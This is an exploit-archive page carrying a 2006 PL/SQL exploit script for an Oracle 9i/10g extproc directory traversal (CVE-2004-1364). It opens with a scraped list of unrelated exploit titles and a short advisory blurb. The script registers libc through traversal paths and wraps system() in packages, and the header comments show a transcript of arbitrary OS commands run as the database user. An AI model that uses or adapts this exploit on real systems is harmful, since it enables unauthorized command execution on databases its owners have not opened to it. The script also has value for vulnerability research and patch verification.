
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
101 lines
No EOL
3.3 KiB
SQL
101 lines
No EOL
3.3 KiB
SQL
source: https://www.securityfocus.com/bid/10871/info
|
|
|
|
Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
|
|
|
|
The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others.
|
|
|
|
There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending.
|
|
|
|
Note that a number of unsupported versions of affected products may also potentially be vulnerable.
|
|
|
|
--
|
|
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
|
|
--
|
|
-- raptor_oraextproc.sql - command exec via oracle extproc
|
|
-- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
|
|
--
|
|
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g
|
|
-- allows remote attackers to access arbitrary libraries outside of the
|
|
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
|
|
--
|
|
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
|
|
-- to remotely execute arbitrary OS commands with the privileges of the DBMS
|
|
-- user (the CREATE [ANY] LIBRARY privilege is needed).
|
|
--
|
|
-- See also:
|
|
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
|
|
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
|
|
--
|
|
-- Vulnerable platforms:
|
|
-- Oracle 9i (all versions?)
|
|
-- Oracle 10g versions prior to 10.1.0.3
|
|
--
|
|
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
|
|
-- running on both Solaris 9 and 10 systems. It will need some tweakings to
|
|
-- properly work on other platforms.
|
|
--
|
|
-- Usage example:
|
|
-- $ echo $ORACLE_HOME
|
|
-- /opt/oracle/
|
|
-- $ sqlplus "/ as sysdba"
|
|
-- [...]
|
|
-- Connected to:
|
|
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
|
|
-- With the Partitioning, OLAP and Oracle Data Mining options
|
|
-- JServer Release 9.2.0.1.0 - Production
|
|
-- SQL> @raptor_oraextproc.sql
|
|
-- [...]
|
|
-- exec oracmd32.exec('touch /tmp/32');
|
|
-- [...]
|
|
-- ERROR at line 1:
|
|
-- ORA-06520: PL/SQL: Error loading external library
|
|
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
|
|
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
|
|
-- ELFCLASS32
|
|
-- [...]
|
|
-- SQL> exec oracmd64.exec('touch /tmp/64');
|
|
-- SQL> !ls -l /tmp/64
|
|
-- -rw-r--r-- 1 oracle orainst 0 Dec 19 13:49 /tmp/64
|
|
--
|
|
|
|
-- library for 32-bit oracle releases
|
|
create or replace library exec_shell32 as
|
|
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
|
|
/
|
|
|
|
-- library for 64-bit oracle releases
|
|
create or replace library exec_shell64 as
|
|
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
|
|
/
|
|
|
|
-- package for 32-bit oracle releases
|
|
-- usage: exec oracmd32.exec('command');
|
|
create or replace package oracmd32 as
|
|
procedure exec(cmdstring in char);
|
|
end oracmd32;
|
|
/
|
|
create or replace package body oracmd32 as
|
|
procedure exec(cmdstring in char)
|
|
is external
|
|
name "system"
|
|
library exec_shell32
|
|
language c;
|
|
end oracmd32;
|
|
/
|
|
|
|
-- package for 64-bit oracle releases
|
|
-- usage: exec oracmd64.exec('command');
|
|
create or replace package oracmd64 as
|
|
procedure exec(cmdstring in char);
|
|
end oracmd64;
|
|
/
|
|
create or replace package body oracmd64 as
|
|
procedure exec(cmdstring in char)
|
|
is external
|
|
name "system"
|
|
library exec_shell64
|
|
language c;
|
|
end oracmd64;
|
|
/
|
|
|
|
-- milw0rm.com [2006-12-19] |